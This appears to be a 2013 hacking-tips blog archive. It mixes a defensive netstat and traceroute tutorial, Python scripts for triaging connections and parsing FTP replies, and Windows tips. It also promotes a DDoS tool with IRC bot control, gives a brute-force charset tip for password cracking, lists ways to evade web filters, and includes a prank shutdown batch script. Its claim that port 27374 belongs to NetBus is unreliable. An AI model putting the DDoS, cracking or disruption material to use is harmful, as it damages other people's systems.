A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit. 

So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine? 

Virtual and Physical Ports

Everything that you receive over the Internet comes as a result of other machines connecting to your computer's ports. You have two types: Physical ports are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without. Knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

What do the phrases TCP/UDP actually mean?

TCP/IP stands for Transmission Control Protocol and Internet Protocol. A TCP/IP packet is a block of data which is compressed, then has a header put on it, and is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur: by sending packets. The header in a packet contains the IP address of the one who originally sent it to you. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on. That tool is NETSTAT.

Netstat: Your first line of defence

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type: 

netstat -a 
(make sure you include the space in between the "t" and the "a").
If you're connected to the Internet when you do this, you should see something like: 

Active Connections

  Proto  Local Address      Foreign Address                    State
  TCP    macintosh:20034    modem-123.tun.dialup.co.uk:50505   ESTABLISHED
  TCP    macintosh:80       proxy.webcache.eng.sq:30101        TIME_WAIT
  TCP    macintosh          MACINTOSH:0                        LISTENING
  TCP    macintosh          MACINTOSH:0                        LISTENING
  TCP    macintosh          MACINTOSH:0                        LISTENING

Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc. 

Now, you need to know all of Netstat's various commands, so type: 

netstat ? 

You will get something like this: 
Displays protocol statistics and current TCP/IP network connections. 
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 
-a Displays all connections and listening ports. 
-e Displays Ethernet statistics. This may be combined with the -s option. 
-n Displays addresses and port numbers in numerical form. 
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. 
-r Displays the routing table. 
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. 

Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is 

netstat -an 

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users. Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). By doing this, you can also find out what your own IP address is, which is always useful.

Also, 
netstat -b 
will tell you what ports are open and what programs are connecting to the internet. 

Types of Port

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port: 

# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is SMTP (Simple Mail Transfer Protocol)), so if you find one of these ports open (and you usually will), it's usually because of an essential function.

# Registered Ports These run from 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, email clients and so on, which open a random port within this range before communicating with the remote server. So don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the program that's using them terminates (for example, type a common website name into your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote server). Services like MSN Messenger and ICQ usually run on these Ports.

# Dynamic/Private Ports Ranging from 49152 to 65535, these are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap:

Well Known Ports         0 to 1023        Commonly used, little danger.
Registered Ports         1024 to 49151    Not as common, just be careful.
Dynamic/Private Ports    49152 to 65535   Be extremely suspicious.

The hunt is on

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive, and they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat:

Active Connections

  Proto  Local Address      Foreign Address                    State
  TCP    macintosh:27374    modem-123.tun.dialup.co.uk:50505   ESTABLISHED
  TCP    macintosh:80       proxy.webcache.eng.sq:30101        TIME_WAIT
  TCP    macintosh          MACINTOSH:0                        LISTENING
  TCP    macintosh          MACINTOSH:0                        LISTENING
  TCP    macintosh          MACINTOSH:0                        LISTENING

Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (i.e. for all intents and purposes, it's how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc. You're simply connected to the net through a proxy.

So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is: 

1) run Netstat , and use: 
Netstat -a 
then 
Netstat -an 
So you have both Hostnames AND IP addresses. 
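To make the port-range recap and the two Netstat steps above concrete, here is a small triage script. It is an added example written for this page, not part of the original tutorial: it parses rows in the `netstat -an` layout (the sample rows, the 203.0.113.45 address and the port numbers are constructed), classifies every local port into the tutorial's three ranges, and flags a row when a registered or dynamic local port has no well-known service on either end, or when the local port is the one the tutorial names (27374). The `reverse_dns` helper is the tutorial's rDNS step and needs network access, so the offline run does not call it.

```python
import re
import socket
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Port classes exactly as the tutorial divides them (the IANA ranges).
WELL_KNOWN_MAX = 1023
REGISTERED_MAX = 49151

# Ports the tutorial names; a high port on this list is flagged outright.
NOTABLE_PORTS = {
    25: "smtp",
    80: "http",
    27374: "NetBus default (the port named in the tutorial)",
}


@dataclass
class Conn:
    proto: str
    local_host: str
    local_port: Optional[int]
    remote_host: str
    remote_port: Optional[int]
    state: str


def port_class(port: int) -> str:
    """Map a port number onto the tutorial's three classes."""
    if port <= WELL_KNOWN_MAX:
        return "well-known"
    if port <= REGISTERED_MAX:
        return "registered"
    return "dynamic/private"


# One 'netstat -an' row: proto, host:port, host:port, optional state.
# Hosts may be IPv4, bracketed IPv6 or '*'; the port may be '*' on UDP rows.
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+(\S+))?\s*$", re.I)


def _port(text: str) -> Optional[int]:
    return None if text == "*" else int(text)


def parse_netstat(output: str) -> List[Conn]:
    """Parse the rows of 'netstat -an'; header and blank lines are skipped."""
    conns = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if m:
            proto, lh, lp, rh, rp, state = m.groups()
            conns.append(Conn(proto.upper(), lh, _port(lp), rh, _port(rp), state or ""))
    return conns


def triage(conns: List[Conn]) -> List[Tuple[Conn, str, str]]:
    """Give every row a verdict ('normal' or 'suspicious') and a reason."""
    results = []
    for c in conns:
        lp, rp, state = c.local_port, c.remote_port, c.state.upper()
        if lp is None:
            results.append((c, "normal", "no local port"))
            continue
        cls = port_class(lp)
        if lp in NOTABLE_PORTS and lp > WELL_KNOWN_MAX:
            results.append((c, "suspicious", f"local port {lp} is {NOTABLE_PORTS[lp]}"))
        elif state == "LISTENING" and cls == "dynamic/private":
            results.append((c, "suspicious", f"listener on {cls} port {lp}"))
        elif state == "ESTABLISHED" and cls != "well-known" and rp is not None and rp > WELL_KNOWN_MAX:
            # Neither end is a standard service port: nothing explains this pairing.
            results.append((c, "suspicious", f"{cls} port {lp} talking to high remote port {rp}"))
        elif state == "ESTABLISHED" and cls != "well-known":
            # High local port but a well-known remote port: an ordinary outbound client.
            results.append((c, "normal", f"outbound client to remote port {rp}"))
        else:
            results.append((c, "normal", f"{cls} port {lp}"))
    return results


def reverse_dns(ip: str) -> Optional[str]:
    """The tutorial's rDNS step. Needs network access, so the offline demo skips it."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


# Constructed sample output in the 'netstat -an' layout; not captured from a real host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49702     93.184.216.34:443      ESTABLISHED
  TCP    192.168.1.10:27374     203.0.113.45:50505     ESTABLISHED
  TCP    0.0.0.0:54321          0.0.0.0:0              LISTENING
  UDP    0.0.0.0:500            *:*
"""

if __name__ == "__main__":
    for c, verdict, reason in triage(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{verdict:10} {c.proto} {c.local_host}:{c.local_port} -> "
              f"{c.remote_host}:{c.remote_port} {c.state} ({reason})")
```

One caveat the tutorial glosses over: on a real machine every outbound connection shows a high local port (the client's ephemeral port) paired with a well-known remote port, and that is normal. The script therefore treats only the high-to-high pairing and a listener in the dynamic range as suspicious, which is what keeps it useful on a live `netstat -an` dump rather than flagging every browser connection.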

Tracerouting

Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you know how they work?

Go back to MSDOS and type 

tracert *type IP address/Hostname here* 

Now, what happens is, the Traceroute will show you all the computers between you and the target machine, including blockages, firewalls etc. More often than not, the hostname listed before the final one will belong to the Hacker's ISP. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname to see who the ISP in question is.

If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as 

http://www.haha.com 

Well, that tells us nothing, right? Wrong. Simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in.

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial). 

Reverse DNS Query

This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe. 

To run an rDNS query, simply go back to MS-DOS and type 
netstat and hit return. Any active connections will resolve to hostnames rather than a numerical format. 

DNS

DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address, which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Reverse DNS, of course, translates the IP Address into a Hostname (i.e. in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname).

So, for example, 
298.12.87.32 is NOT a Hostname. 
mail6.bol.net.au IS a Hostname. 

Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well. 

You can also deduce the IP address of the sender by looking at the email's header (a "hidden" block of text which contains information on the sender). On Hotmail, for example, go to Preferences and select the "Full Headers Visible" option. Alternatively, you can run a "Finger" Trace on the email address at:

www.samspade.org 

Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to 

abuse@companynamegoeshere.com 

FTP Error Codes

FTP Error Messages 

Some nice info about FTP error codes so you know what they mean. I am sure you see them all the time and sometimes you don't know what they mean, so take a look here.

The most common codes: 

421 - often means: too many users logged in to the same account.
530 - wrong login password; some servers auto-switch to 530 from 421 when they reach the max number of users, so notice the error message attached to the code.
550 - common on ratio sites. If the file exists, it means you have no access to the file or dir.

If you try changing directories in an FTP and you're getting a 550 message, it means you don't have access to the directory.

It doesn't mean you don't have access to a directory inside that directory. (Meaning when you have a direct path, log into the path directly, not 1 directory by 1.)

All others: 

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.
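As an added example (not from the page's author), the following Python reply parser makes the list above usable in code: it splits a reply into code and text, handles the multi-line form ("214-..." terminated by a "214 " line), explains a code by its first two digits as RFC 959 defines them, says whether a 4xx reply is worth retrying, and decodes the (h1,h2,h3,h4,p1,p2) tuple of a 227 reply into an address and port. The sample replies at the bottom are constructed from the codes listed above, not captured from a server.

```python
import re
from typing import List, Tuple

# Meaning of the first digit of a reply code (RFC 959, section 4.2).
FIRST_DIGIT = {
    "1": "positive preliminary (wait for a further reply)",
    "2": "positive completion (command succeeded)",
    "3": "positive intermediate (send the next command in the sequence)",
    "4": "transient negative (failed now, may be retried)",
    "5": "permanent negative (failed, do not repeat as-is)",
}

# Meaning of the second digit: what the reply is about.
SECOND_DIGIT = {
    "0": "syntax",
    "1": "information",
    "2": "connections",
    "3": "authentication and accounting",
    "4": "unspecified",
    "5": "file system",
}


def classify(code: int) -> Tuple[str, str]:
    """Explain a reply code by its first two digits, e.g. 550 -> permanent negative, file system."""
    digits = str(code)
    if len(digits) != 3 or digits[0] not in FIRST_DIGIT or digits[1] not in SECOND_DIGIT:
        raise ValueError(f"not a well-formed FTP reply code: {code!r}")
    return FIRST_DIGIT[digits[0]], SECOND_DIGIT[digits[1]]


def is_retryable(code: int) -> bool:
    """4xx replies (421, 450, ... above) are the only ones worth retrying unchanged."""
    return 400 <= code <= 499


def parse_reply(raw: str) -> Tuple[int, List[str]]:
    """Split a server reply into (code, text lines).

    A single-line reply is 'xyz text'.  A multi-line reply starts with
    'xyz-text' and ends with a line beginning 'xyz ' carrying the same code.
    """
    lines = raw.splitlines()
    if not lines or len(lines[0]) < 3 or not lines[0][:3].isdigit():
        raise ValueError(f"reply does not start with a 3-digit code: {raw!r}")
    first = lines[0]
    code = int(first[:3])
    separator = first[3] if len(first) > 3 else " "
    if separator == " ":
        return code, [first[4:]]
    if separator != "-":
        raise ValueError(f"unexpected character after code: {first!r}")
    text = [first[4:]]
    for line in lines[1:]:
        if line.startswith(f"{code} "):
            text.append(line[4:])
            return code, text
        text.append(line)
    raise ValueError("multi-line reply was not terminated")


_PASV = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(text: str) -> Tuple[str, int]:
    """Decode the (h1,h2,h3,h4,p1,p2) tuple of a 227 reply into (ip, port)."""
    m = _PASV.search(text)
    if not m:
        raise ValueError(f"no PASV tuple in reply: {text!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError(f"PASV tuple has a value above 255: {text!r}")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def pasv_host_is_peer(control_peer_ip: str, reply_text: str) -> bool:
    """Defensive check: the data address announced in a 227 reply should be
    the same host the control connection is already talking to."""
    host, _ = parse_pasv(reply_text)
    return host == control_peer_ip


# Constructed sample replies built from the code list on the page; not captured from a server.
SAMPLE_REPLIES = [
    "230 User logged in, proceed.",
    "227 Entering Passive Mode (192,168,1,10,195,80).",
    "421 Too many users logged to the same account",
    "550 Requested action not taken. File unavailable (e.g., file not found, no access).",
    "214-The following commands are recognized.\n USER PASS QUIT\n214 Help OK.",
]

if __name__ == "__main__":
    for raw in SAMPLE_REPLIES:
        code, text = parse_reply(raw)
        kind, topic = classify(code)
        print(f"{code} [{kind}; {topic}] retry={is_retryable(code)}: {text[0]}")
```

`pasv_host_is_peer` is the check a client should run on every 227: if the announced data address is not the host the control connection is talking to, treat the reply as suspect instead of opening a data connection to it.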

Thursday, June 6, 2013

Sand Box

What is sand box?

A sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third parties, suppliers, untrusted users and untrusted websites.

The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted.


Sandboxie

Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Benefits of the Isolated Sandbox
  1. Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
  2. Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
  3. Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
  4. Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.



Tuesday, June 4, 2013

Types Of Hackers

Hacker: a person who accesses a computer resource without authorization, uses his or her skills to commit unlawful acts, or deliberately creates mischief.

There are six types of hackers:

  1. CODERS
  2. ADMINS
  3. SCRIPT KIDDIES
  4. WHITE HAT
  5. BLACK HAT
  6. GREY HAT
CODERS

The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses such as buffer overflow in software to create their own exploits.

ADMINS
Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques; instead they use the tricks which are already prepared by the coders. They are generally System Administrators or Computer Network Controllers. Most of the Hackers and security people in this digital world come under this category.


SCRIPT KIDDIES

Script Kiddies are the bunnies who use scripts and programs developed by others to attack computer systems and Networks. They get the least respect but are the most annoying and dangerous, and can cause big problems without actually knowing what they are doing.

WHITE HAT
A White Hat Hacker is a computer guy who performs Ethical Hacking. These are usually security professionals with knowledge of hacking and the Hacker tool set, who use this knowledge to locate security weaknesses and implement countermeasures in the resources. They are also known as Ethical Hackers or Penetration Testers. They focus on Securing and Protecting IT systems.

BLACK HAT
A Black Hat Hacker is a computer guy who performs Unethical Hacking. These are the Criminal Hackers or Crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines with malicious intent. These are also known as Unethical Hackers or Security Crackers. They focus on Security Cracking and Data stealing.

GREY HAT
A Grey Hat Hacker is a computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits. They are a hybrid between White Hat and Black Hat Hackers.

Common Run Command

compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation

conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad

Control
Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl

shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shell:Profile %userprofile%
shell:CommonProgramFiles
shell:ProgramFiles %programfiles%
shell:System
shell:Windows %windir%
shell:History
shell:Cookies
shell:Local AppData
shell:AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:Templates
shell:PrintHood
shell:NetHood
shell:Favorites
shell:Personal
shell:SendTo
shell:Recent
shell:Menu
shell:Programs
shell:Startup
shell:Desktop
shell:Fonts
shell:ConnectionsFolder
shell:RecycleBinFolder
shell:PrintersFolder
shell:ControlPanelFolder Control
shell:InternetFolder
shell:DriveFolder
shell:NetworkFolder
shell:DesktopFolder

Monday, June 3, 2013

Enhance Brute Force Attack Charset

Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz, you'll get passwords much faster than with the standard a-z0-9 charset. With a charset of a-z0-9, the password cracking program will try aaaaaaa, baaaaaa, caaaaaa and so on.

But with 0-9a-z, the program will try 00000000, 10000000, 2000000 and so on, so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charsets will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much but I find it does help.

Another common technique is to use eatoinsrhldcumfpgwybvkxjqz instead of abcdefghijklmnopqrstuvwxyz.

Everyone knows that 'e' is the most commonly used letter in the English language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon that I sometimes leave them off the list altogether, since it makes such a significant improvement in cracking time.

Sunday, June 2, 2013

Google Hacks

Almost every internet user would recognize one of the most popular search engines, "GOOGLE". By utilizing the various search operators already provided in the Google Search Engine, we can make our search results more accurate. Therefore, an application named "Google Hacks" appeared to help users make use of Google's search functions.



What is Google Hacks? Google Hacks is an open source application that can be used as an aid in searching through Google. Searching for music, ebooks, videos, product keys, lyrics and fonts is part of the basic search functionality of this program. Enter keywords and click the options provided, and Google Hacks will weave the keywords with search operators and display Google's result pages in the browser. If we are lucky, we will get what we are looking for.

DOWNLOAD HERE

Friday, May 31, 2013

HIVE MIND LOIC

Hive Mind LOIC is a version of the Low Orbit Ion Cannon made by Praetox, which was adapted for centralized control by NewEraCracker, when the project was then taken on by me. Amongst a few fixes, I added RSS control (such as via Twitter). - Urijah

  • Stress test your servers against a DDoS attack
  • Control your bots via an IRC channel or an RSS server
  • Minimize the application to systray


Official Website: Hive Mind LOIC

Download : HERE

Thursday, May 30, 2013

Ways To Access Blocked WebSite

Usually, websites are blocked or filtered depending on the situation, such as company policies, school policies, or even country policy. Luckily, some tricks exist to help overcome this situation and bypass the restrictions; the most common method is the use of proxies or anonymizer websites. Unfortunately, using proxies doesn't always work, as they might get blocked by the firewall.

The following are some other methods you can consider to access blocked websites:

Use IP instead of URL

Each website has its own IP address, represented by the URL. This method works best when the filter list is defined by URL. For example, to access Facebook, simply type 173.252.73.52 in the browser. You can check a website's IP using the ping command in the command prompt.

Use cache

Most search engines store cached pages of websites. You can access a blocked website by viewing the cached copy in the search engine.

Translation services

Google Translate or Bing Translate can translate a website into another language (but we don't need that). When you do this, you are actually accessing the website via Google's/Bing's IP.

 Retrieve website via Email

Web2Mail is a free service that sends any website to your inbox. Just send an email to www@web2mail.com with the URL as the subject.

Website archive

The Wayback Machine is an internet archive that stores a copy of almost all websites since they started, plus updated versions after that. You can access a blocked website by fetching the latest copy from the archive.

Screen Resolution

An interesting website that allows you to view any website in different resolutions. Similar to the translation service, you are actually accessing the blocked website via that website's IP. (Internet Explorer only)

Mobile Search

Display a website in mobile form, which evades the filtering list. You can use Springbox Mobilizer, an emulator that works like a mobile phone on your desktop.

Short URL service

Usually used to convert a long URL into a shorter one that is easy to remember. You can convert your blocked website's URL into a shorter one to evade detection. Popular URL shortening services are bit.ly and adf.ly.

Tor Browser

A virtual tunnel that redirects your request through a distributed network of relays. You can learn more HERE.

Proxy Websites

Some other websites that offer proxy services.

Proxy Website List

http://www.hidemyass.com
http://www.anonymizer.com
http://www.wujie.net
http://www.ultrareach.net
http://surfshield.net
http://www.guardster.com/subscription/proxy_free.php
http://anonymouse.ws/anonwww.html
http://www.browser-x.com
http://www.spysurfing.com
http://www.xerohour.org/hideme
http://www.proxyz.be
http://www.sc0rian.com/prox
https://www.proxify.us
http://kproxy.com/index.jsp
http://www.brawl-hall.com/pages/proxy.php
http://www.proxify.net
http://proxy.computersteroids.com/index0.php
http://www.unipeak.com
http://flyproxy.com
http://alienproxy.com
http://proxify.com
http://www.unfilter.net
http://www.proxymouse.com
http://www.surfonym.com/cgi-bin/nph-proxy
http://www.superproxy.be/browse.pl
http://www.websiteguru.com/mrnewguy
http://www.letsproxy.com
http://www.fsurf.com
http://indianproxy.com
http://www.letmeby.com
http://Boredatschool.net
http://www.ibypass.org
http://www.ipzap.com
https://proxify.biz
http://www.attackcensorship.com/attack-censorship.html
http://mrnewguy.com
http://www.evilsprouts.co.uk/defilter
http://www.proxify.info
http://www.torify.com
http://www.switchproxy.com
http://www.proxifree.com
http://www.secure-tunnel.com
http://www.proxify.cn
http://www.arnit.net/utilities/webproxy/new
http://www.proxify.co.uk
http://www.betaproxy.com
http://www.proxify.org
http://www.proxychoice.com
http://www.proxysnail.com
http://www.anonypost.com
http://www.thestrongestlinks.com
http://www.hujiko.com
http://www.anonproxy.info
http://www.peoplesproxy.com
http://www.freeproxy.us
http://www.proxyweb.net
http://www.nopath.com
http://urlencoded.com
http://www.pole.ws
http://www.browseany.com
http://www.spiderproxy.com
http://www.clickcop.com
http://www.sneakysurf.com
http://www.mywebtunnel.com
http://www.thewebtunnel.com
http://www.3proxy.com
http://www.yourfreeproxy.com
http://www.proxy7.com
http://www.fireprox.com
http://www.stupidcensorship.com
http://www.sneak2.com
http://www.cecid.com
http://www.freeproxy.ca
http://www.goproxing.com
http://www.projectbypass.com
http://www.ipsecret.com
http://www.nomorelimits.net
http://www.proxify.de
http://www.bywhat.com
http://www.snoopblocker.com
http://www.anonymizer.ru
http://www.proxyking.net
http://www.perlproxy.com
http://www.proxylord.com
http://tntproxy.com
http://satanproxy.com
http://zombieinvasion.info

Tuesday, May 28, 2013

Shutdown PC

Make use of shutdown.exe in Windows to prank your friends.
  1. Create a shortcut: right-click the desktop, point to New and select Shortcut.
  2. Type or paste the following command as the shortcut's location:
    • C:\Windows\System32\shutdown.exe -s -t 60 -c "message"
  3. -s shuts down the computer | -t sets the delay in seconds | -c sets the message shown to the user.
  4. Simply replace 60 with any number of seconds you like, and remember to put in a scary message for your friend.
  5. If the joke has to be called off, shutdown -a aborts the countdown, but only while the timer is still running.

Notepad Version

Copy the following code into Notepad:

@echo off
REM Pop a message box in every logged-on session, then start a 60-second shutdown countdown.
msg * I don't like you
shutdown -s -t 60 -c "Error! You are too stupid!"

Save it as Hackmimic_shutdown.bat (not .txt) and double-click it to run. msg.exe is not shipped with Home editions of Windows; there the msg line simply fails and the shutdown still goes ahead.

Update:

